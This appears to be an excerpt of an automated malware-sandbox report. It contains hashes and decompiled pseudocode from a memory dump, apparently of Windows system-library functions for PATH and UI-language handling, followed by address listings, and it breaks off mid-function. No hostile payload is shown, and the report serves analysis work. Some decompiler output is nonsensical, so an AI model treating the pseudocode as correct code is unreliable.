                                                                                        • Opcode ID: 99301c99134d65efa9b5b862c7284c7a9944ef28658c5052e31ee2d1ac3e90dd
                                                                                        • Instruction ID: 733fb905d3d80b1fbe7d1d1263fdaa72bb13629d7f0897b7682e9f0be2e5f012
                                                                                        • Opcode Fuzzy Hash: 99301c99134d65efa9b5b862c7284c7a9944ef28658c5052e31ee2d1ac3e90dd
                                                                                        • Instruction Fuzzy Hash: 1C51F671608381CFCB20DF2AC480A2BBBE5FB88750F2449AEF59597255DB71EC44CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BF2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 86%
                                                                                        			E00BF2581(intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t168;
				signed int _t172;
				void* _t173;
				signed int _t180;
				signed int _t186;
				signed int _t188;
				unsigned int _t193;
				signed int _t197;
				signed int _t209;
				signed int _t211;
				signed int _t217;
				signed int _t218;
				signed int _t221;
				signed int _t223;
				void* _t224;
				void* _t226;

				_t221 = _t223;
				_t224 = _t223 - 0x4c;
				_v8 =  *0xcbd360 ^ _t221;
				_t217 = 0xcbb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t193 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t226 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t186 = 0x48;
				_t206 = 0 | _t226 == 0x00000000;
				_t209 = 0;
				_v37 = _t226 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t186 - 0x48; // 0x0
					if(_t45 > 0xfffe) {
						_t218 = 0xc0000106;
						goto L32;
					} else {
						_t217 = L00BE4620(_t193,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t186);
						_v52 = _t217;
						if(_t217 == 0) {
							_t218 = 0xc0000017;
							goto L32;
						} else {
							 *(_t217 + 0x44) =  *(_t217 + 0x44) & 0x00000000;
							_t50 = _t217 + 0x48; // 0x48
							_t211 = _t50;
							_t206 = _v32;
							 *(_t217 + 0x3c) = _t186;
							_t188 = 0;
							 *((short*)(_t217 + 0x30)) = _v48;
							if(_t206 != 0) {
								 *(_t217 + 0x18) = _t211;
								 *_t217 = ((0 | _t206 == 0x00cb8478) - 0x00000001 & 0xfffffffb) + 7;
								E00C0F3E0(_t211,  *((intOrPtr*)(_t206 + 4)),  *_t206 & 0x0000ffff);
								_t206 = _v32;
								_t224 = _t224 + 0xc;
								_t188 = 1;
								_t211 = _t211 + (( *_t206 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t180 = E00C539F2(_t211);
									_t206 = _v32;
									_t211 = _t180;
								}
							}
							_t197 = 0;
							_v16 = 0;
							if(_v48 <= 0) {
								L31:
								_t218 = _v68;
								 *((short*)(_t211 - 2)) = 0;
								goto L32;
							} else {
								_t186 = _t217 + _t188 * 4;
								_v56 = _t186;
								do {
									if(_t206 != 0) {
										_t168 =  *(_v60 + _t197 * 4);
										if(_t168 == 0) {
											goto L30;
										} else {
											if(_t168 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t186 =  *(_v60 + _t197 * 4);
										 *(_t186 + 0x18) = _t211;
										_t172 =  *(_v60 + _t197 * 4);
										if(_t172 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t172 * 4 +  &M00BF2959))) {
												case 0:
													__ax =  *0xcb8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E00C0F3E0(__edi,  *0xcb848c, __ax & 0x0000ffff);
														__eax =  *0xcb8488 & 0x0000ffff;
														goto L26;
													}
													goto L80;
												case 1:
													L45:
													E00C0F3E0(_t211, _v80, _v64);
													_t175 = _v64;
													goto L26;
												case 2:
													 *0xcb8480 & 0x0000ffff = E00C0F3E0(__edi,  *0xcb8484,  *0xcb8480 & 0x0000ffff);
													__eax =  *0xcb8480 & 0x0000ffff;
													__eax = ( *0xcb8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E00C0F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L80;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E00C0F3E0(_t211, _v76, _v36);
														_t175 = _v36;
													}
													L26:
													_t224 = _t224 + 0xc;
													_t211 = _t211 + (_t175 >> 1) * 2 + 2;
													__eflags = _t211;
													L27:
													_push(0x3b);
													_pop(_t177);
													 *((short*)(_t211 - 2)) = _t177;
													goto L28;
												case 6:
													__ebx =  *0xcb575c;
													__eflags = __ebx - 0xcb575c;
													if(__ebx != 0xcb575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E00C0F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0xcb575c;
														} while (__ebx != 0xcb575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0xcb8478 & 0x0000ffff = E00C0F3E0(__edi,  *0xcb847c,  *0xcb8478 & 0x0000ffff);
													__eax =  *0xcb8478 & 0x0000ffff;
													__eax = ( *0xcb8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E00C539F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0xcb6e58 & 0x0000ffff = E00C0F3E0(__edi,  *0xcb6e5c,  *0xcb6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0xcb6e58 & 0x0000ffff;
													__eax = ( *0xcb6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t197 = _v16;
													_t206 = _v32;
													L29:
													_t186 = _t186 + 4;
													__eflags = _t186;
													_v56 = _t186;
													goto L30;
											}
										}
									}
									goto L80;
									L30:
									_t197 = _t197 + 1;
									_v16 = _t197;
								} while (_t197 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t172 =  *(_v60 + _t209 * 4);
						if(_t172 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t172 * 4 +  &M00BF2935))) {
							case 0:
								__ax =  *0xcb8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t206 =  &_v64;
								_v80 = E00BF2E3E(0,  &_v64);
								_t186 = _t186 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0xcb8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xcb8480;
									goto L59;
								}
								goto L14;
							case 3:
								E00BDEEF0(0xcb79a0) =  &_v44;
								_push( &_v44);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								__esi = E00BF2990(__ebx, __edi, __esi, __eflags);
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E00BDEB70(__ecx, 0xcb79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t146 = _v72;
											__eflags = _t146;
											if(_t146 != 0) {
												L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t146);
											}
											_t147 = _v52;
											__eflags = _t147;
											if(_t147 != 0) {
												__eflags = _t218;
												if(_t218 < 0) {
													L00BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t147);
													_t147 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t193 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0xcb7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L00BE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eflags == 0) {
										__eax = E00BDEB70(__ecx, 0xcb79a0);
										__eax = _v52;
										L36:
										_pop(_t210);
										_pop(_t219);
										__eflags = _v8 ^ _t221;
										_pop(_t187);
										return E00C0B640(_t147, _t187, _v8 ^ _t221, _t206, _t210, _t219);
									} else {
										__ecx =  &_v44;
										_push( &_v44);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										__eax = E00BF2990(__ebx, __edi, __esi, __eflags);
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L80;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t182 = _v56;
								if(_v56 != 0) {
									_t206 =  &_v36;
									_t184 = E00BF2E3E(_t182,  &_v36);
									_t193 = _v36;
									_v76 = _t184;
								}
								if(_t193 == 0) {
									goto L44;
								} else {
									_t186 = _t186 + 2 + _t193;
								}
								goto L14;
							case 6:
								__eax =  *0xcb5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0xcb8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xcb8478;
									L59:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0xcb6e58 & 0x0000ffff;
								__eax = ( *0xcb6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t209 = _t209 + 1;
								if(_t209 >= _v48) {
									goto L16;
								} else {
									_t206 = _v37;
									goto L1;
								}
								goto L80;
						}
					}
					L56:
					_push(0x25);
					asm("int 0x29");
					asm("out 0x28, al");
					_t173 = _t172 + _t172;
					asm("daa");
					 *((intOrPtr*)(_t217 + 0x28)) =  *((intOrPtr*)(_t217 + 0x28)) + _t173;
					 *0xbf260500 =  *0xbf260500 + _t186;
					return _t173;
				}
				L80:
			}




































                                                                                        0x00bf2584
                                                                                        0x00bf2586
                                                                                        0x00bf2590
                                                                                        0x00bf2599
                                                                                        0x00bf259e
                                                                                        0x00bf25a4
                                                                                        0x00bf25a9
                                                                                        0x00bf25ac
                                                                                        0x00bf25ae
                                                                                        0x00bf25b1
                                                                                        0x00bf25b2
                                                                                        0x00bf25b5
                                                                                        0x00bf25b8
                                                                                        0x00bf25bb
                                                                                        0x00bf25bc
                                                                                        0x00bf25bf
                                                                                        0x00bf25c2
                                                                                        0x00bf25c5
                                                                                        0x00bf25c6
                                                                                        0x00bf25cb
                                                                                        0x00bf25ce
                                                                                        0x00bf25d8
                                                                                        0x00bf25db
                                                                                        0x00bf25dd
                                                                                        0x00bf25de
                                                                                        0x00bf25e1
                                                                                        0x00bf25e3
                                                                                        0x00bf25e9
                                                                                        0x00bf26da
                                                                                        0x00bf26da
                                                                                        0x00bf26e2
                                                                                        0x00c35b56
                                                                                        0x00000000
                                                                                        0x00bf26e8
                                                                                        0x00bf26f9
                                                                                        0x00bf26fb
                                                                                        0x00bf2700
                                                                                        0x00c35b60
                                                                                        0x00000000
                                                                                        0x00bf2706
                                                                                        0x00bf2706
                                                                                        0x00bf270a
                                                                                        0x00bf270a
                                                                                        0x00bf270d
                                                                                        0x00bf2713
                                                                                        0x00bf2716
                                                                                        0x00bf2718
                                                                                        0x00bf271e
                                                                                        0x00c35b6c
                                                                                        0x00c35b7f
                                                                                        0x00c35b89
                                                                                        0x00c35b8e
                                                                                        0x00c35b93
                                                                                        0x00c35b96
                                                                                        0x00c35ba0
                                                                                        0x00c35ba3
                                                                                        0x00c35bab
                                                                                        0x00c35bb0
                                                                                        0x00c35bb3
                                                                                        0x00c35bb3
                                                                                        0x00c35ba3
                                                                                        0x00bf2724
                                                                                        0x00bf2726
                                                                                        0x00bf272c
                                                                                        0x00bf279d
                                                                                        0x00bf279d
                                                                                        0x00bf27a2
                                                                                        0x00000000
                                                                                        0x00bf272e
                                                                                        0x00bf272e
                                                                                        0x00bf2731
                                                                                        0x00bf2734
                                                                                        0x00bf2736
                                                                                        0x00c35bc1
                                                                                        0x00c35bc4
                                                                                        0x00000000
                                                                                        0x00c35bca
                                                                                        0x00c35bcd
                                                                                        0x00000000
                                                                                        0x00c35bd3
                                                                                        0x00000000
                                                                                        0x00c35bd3
                                                                                        0x00c35bcd
                                                                                        0x00bf273c
                                                                                        0x00bf273c
                                                                                        0x00bf2742
                                                                                        0x00bf2747
                                                                                        0x00bf274a
                                                                                        0x00bf2750
                                                                                        0x00000000
                                                                                        0x00bf2756
                                                                                        0x00bf2756
                                                                                        0x00000000
                                                                                        0x00bf2902
                                                                                        0x00bf2908
                                                                                        0x00bf290b
                                                                                        0x00000000
                                                                                        0x00bf2911
                                                                                        0x00bf291c
                                                                                        0x00bf2921
                                                                                        0x00000000
                                                                                        0x00bf2921
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bf2880
                                                                                        0x00bf2887
                                                                                        0x00bf288c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bf2805
                                                                                        0x00bf280a
                                                                                        0x00bf2814
                                                                                        0x00bf2816
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bf281e
                                                                                        0x00bf2821
                                                                                        0x00bf2823
                                                                                        0x00000000
                                                                                        0x00bf2829
                                                                                        0x00bf2829
                                                                                        0x00bf2831
                                                                                        0x00bf283c
                                                                                        0x00bf283e
                                                                                        0x00000000
                                                                                        0x00bf283e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bf284e
                                                                                        0x00bf2850
                                                                                        0x00bf2851
                                                                                        0x00bf2854
                                                                                        0x00bf2857
                                                                                        0x00bf285a
                                                                                        0x00bf285c
                                                                                        0x00bf285d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bf275d
                                                                                        0x00bf2761
                                                                                        0x00000000
                                                                                        0x00bf2767
                                                                                        0x00bf276e
                                                                                        0x00bf2773
                                                                                        0x00bf2773
                                                                                        0x00bf2776
                                                                                        0x00bf2778
                                                                                        0x00bf277e
                                                                                        0x00bf277e
                                                                                        0x00bf2781
                                                                                        0x00bf2781
                                                                                        0x00bf2783
                                                                                        0x00bf2784
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c35bd8
                                                                                        0x00c35bde
                                                                                        0x00c35be4
                                                                                        0x00c35be6
                                                                                        0x00c35be8
                                                                                        0x00c35be9
                                                                                        0x00c35bee
                                                                                        0x00c35bf8
                                                                                        0x00c35bff
                                                                                        0x00c35c01
                                                                                        0x00c35c04
                                                                                        0x00c35c07
                                                                                        0x00c35c0b
                                                                                        0x00c35c0d
                                                                                        0x00c35c0d
                                                                                        0x00c35c15
                                                                                        0x00c35c18
                                                                                        0x00c35c1b
                                                                                        0x00c35c1b
                                                                                        0x00c35c1e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bf28c3
                                                                                        0x00bf28c8
                                                                                        0x00bf28d2
                                                                                        0x00bf28d4
                                                                                        0x00bf28d8
                                                                                        0x00bf28db
                                                                                        0x00c35c26
                                                                                        0x00c35c28
                                                                                        0x00c35c2d
                                                                                        0x00c35c2d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c35c34
                                                                                        0x00c35c36
                                                                                        0x00c35c49
                                                                                        0x00c35c4e
                                                                                        0x00c35c54
                                                                                        0x00c35c5b
                                                                                        0x00c35c5d
                                                                                        0x00c35c60
                                                                                        0x00bf2788
                                                                                        0x00bf2788
                                                                                        0x00bf278b
                                                                                        0x00bf278e
                                                                                        0x00bf278e
                                                                                        0x00bf278e
                                                                                        0x00bf2791
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bf2756
                                                                                        0x00bf2750
                                                                                        0x00000000
                                                                                        0x00bf2794
                                                                                        0x00bf2794
                                                                                        0x00bf2795
                                                                                        0x00bf2798
                                                                                        0x00000000
                                                                                        0x00bf2734
                                                                                        0x00bf272c
                                                                                        0x00bf2700
                                                                                        0x00bf25ef
                                                                                        0x00bf25ef
                                                                                        0x00bf25ef
                                                                                        0x00bf25f2
                                                                                        0x00bf25f8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bf25fe
                                                                                        0x00000000
                                                                                        0x00bf28e6
                                                                                        0x00bf28ec
                                                                                        0x00bf28ef
                                                                                        0x00bf28f5
                                                                                        0x00bf28f8
                                                                                        0x00bf28f8
                                                                                        0x00000000
                                                                                        0x00bf28f8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bf2866
                                                                                        0x00bf2866
                                                                                        0x00bf2876
                                                                                        0x00bf2879
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bf27e0
                                                                                        0x00bf27e7
                                                                                        0x00bf27e9
                                                                                        0x00bf27eb
                                                                                        0x00c35afd
                                                                                        0x00000000
                                                                                        0x00c35afd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bf2638
                                                                                        0x00bf263b
                                                                                        0x00bf263c
                                                                                        0x00bf263e
                                                                                        0x00bf2640
                                                                                        0x00bf2642
                                                                                        0x00bf2647
                                                                                        0x00bf264e
                                                                                        0x00bf2650
                                                                                        0x00bf2653
                                                                                        0x00bf2659
                                                                                        0x00bf26a2
                                                                                        0x00bf26a7
                                                                                        0x00bf26ac
                                                                                        0x00bf26b2
                                                                                        0x00c35b11
                                                                                        0x00c35b15
                                                                                        0x00c35b17
                                                                                        0x00000000
                                                                                        0x00bf26b8
                                                                                        0x00bf26b8
                                                                                        0x00bf26ba
                                                                                        0x00bf27a6
                                                                                        0x00bf27a6
                                                                                        0x00bf27a9
                                                                                        0x00bf27ab
                                                                                        0x00bf27b9
                                                                                        0x00bf27b9
                                                                                        0x00bf27be
                                                                                        0x00bf27c1
                                                                                        0x00bf27c3
                                                                                        0x00bf27c5
                                                                                        0x00bf27c7
                                                                                        0x00c35c74
                                                                                        0x00c35c79
                                                                                        0x00c35c79
                                                                                        0x00bf27c7
                                                                                        0x00000000
                                                                                        0x00bf26c0
                                                                                        0x00bf26c0
                                                                                        0x00bf26c3
                                                                                        0x00bf26c6
                                                                                        0x00bf26c6
                                                                                        0x00bf26c9
                                                                                        0x00bf26c9
                                                                                        0x00000000
                                                                                        0x00bf26c9
                                                                                        0x00bf26ba
                                                                                        0x00bf265b
                                                                                        0x00bf265b
                                                                                        0x00bf265e
                                                                                        0x00bf2667
                                                                                        0x00bf266d
                                                                                        0x00bf2677
                                                                                        0x00bf267c
                                                                                        0x00bf267f
                                                                                        0x00bf2681
                                                                                        0x00c35b49
                                                                                        0x00c35b4e
                                                                                        0x00bf27cd
                                                                                        0x00bf27d0
                                                                                        0x00bf27d1
                                                                                        0x00bf27d2
                                                                                        0x00bf27d4
                                                                                        0x00bf27dd
                                                                                        0x00bf2687
                                                                                        0x00bf2687
                                                                                        0x00bf268a
                                                                                        0x00bf268b
                                                                                        0x00bf268e
                                                                                        0x00bf268f
                                                                                        0x00bf2691
                                                                                        0x00bf2696
                                                                                        0x00bf2698
                                                                                        0x00bf269d
                                                                                        0x00bf269f
                                                                                        0x00000000
                                                                                        0x00bf269f
                                                                                        0x00bf2681
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bf2846
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bf2605
                                                                                        0x00bf260a
                                                                                        0x00bf260c
                                                                                        0x00bf2611
                                                                                        0x00bf2616
                                                                                        0x00bf2619
                                                                                        0x00bf2619
                                                                                        0x00bf261e
                                                                                        0x00000000
                                                                                        0x00bf2624
                                                                                        0x00bf2627
                                                                                        0x00bf2627
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c35b1f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bf2894
                                                                                        0x00bf289b
                                                                                        0x00bf289d
                                                                                        0x00bf28a1
                                                                                        0x00c35b2b
                                                                                        0x00c35b2e
                                                                                        0x00c35b2e
                                                                                        0x00bf28a7
                                                                                        0x00bf28a9
                                                                                        0x00c35b04
                                                                                        0x00c35b09
                                                                                        0x00c35b09
                                                                                        0x00c35b09
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c35b35
                                                                                        0x00c35b3c
                                                                                        0x00bf28fb
                                                                                        0x00bf28fb
                                                                                        0x00bf26cc
                                                                                        0x00bf26cc
                                                                                        0x00bf26d0
                                                                                        0x00000000
                                                                                        0x00bf26d2
                                                                                        0x00bf26d2
                                                                                        0x00000000
                                                                                        0x00bf26d2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bf25fe
                                                                                        0x00bf292d
                                                                                        0x00bf292d
                                                                                        0x00bf2930
                                                                                        0x00bf2935
                                                                                        0x00bf293c
                                                                                        0x00bf293e
                                                                                        0x00bf2944
                                                                                        0x00bf294c
                                                                                        0x00bf294f
                                                                                        0x00bf294f
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PATH
                                                                                        • API String ID: 0-1036084923
                                                                                        • Opcode ID: a023e48f3a8fd8446f53390594c4511dff8732e28c226a452f4a378adffc21dc
                                                                                        • Instruction ID: bbe237de565f232bc7108a63c3723a351ec23da84186ffac2237ca18f34724a0
                                                                                        • Opcode Fuzzy Hash: a023e48f3a8fd8446f53390594c4511dff8732e28c226a452f4a378adffc21dc
                                                                                        • Instruction Fuzzy Hash: C8C1A171E00219EBCB25DF99D881BBEB7F5FF48700F544069E901AB290D774AD45DB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BFFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 80%
                                                                                        			E00BFFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E00BDEEF0(0xcb7b60);
					_t134 =  *0xcb7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0xcb7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xcb7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E00BD6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E00BD76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E00C68938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E00BCB150();
													}
													_t116 = E00C66D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E00BD75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0xcb8638; // 0x0
																	_t122 = L00BD38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E00BD76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E00BD76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L00BFFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L00BD70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
